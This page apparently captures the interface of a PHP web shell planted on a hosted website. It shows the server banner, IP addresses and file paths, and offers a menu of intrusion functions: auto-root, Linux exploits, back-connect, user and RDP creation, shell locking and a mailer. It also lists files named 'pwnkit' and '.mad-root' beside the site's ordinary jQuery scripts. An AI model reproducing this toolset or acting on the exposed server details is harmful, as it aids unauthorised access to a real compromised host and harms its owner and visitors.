Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
digital /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
all.js
1.8
KB
-rw----r--
app.js
727
B
-rw----r--
bootstrap.min.js
56.71
KB
-rw----r--
jquery-1.7.2.js
92.62
KB
-rw----r--
jquery-3.3.1.min.js
68.28
KB
-rw----r--
jquery.prettyPhoto.js
35.82
KB
-rw----r--
jquery.quicksand.js
14.35
KB
-rw----r--
popper.min.js
20.51
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
script.js
1.21
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : script.js
jQuery.noConflict(); jQuery(document).ready(function($){ function lightboxPhoto() { jQuery("a[data-gal^='prettyPhoto']").prettyPhoto({ animationSpeed:'fast', slideshow:5000, theme:'light_rounded', show_title:false, overlay_gallery: false }); } if(jQuery().prettyPhoto) { lightboxPhoto(); } if (jQuery().quicksand) { // Clone applications to get a second collection var $data = $(".portfolio-area").clone(); //NOTE: Only filter on the main portfolio page, not on the subcategory pages $('.portfolio-categ li').click(function(e) { $(".filter li").removeClass("active"); // Use the last category class as the category to filter by. This means that multiple categories are not supported (yet) var filterClass=$(this).attr('class').split(' ').slice(-1)[0]; if (filterClass == 'all') { var $filteredData = $data.find('.portfolio-item2'); } else { var $filteredData = $data.find('.portfolio-item2[data-type=' + filterClass + ']'); } $(".portfolio-area").quicksand($filteredData, { duration: 600, adjustHeight: 'auto' }, function () { lightboxPhoto(); }); $(this).addClass("active"); return false; }); }//if quicksand });
Close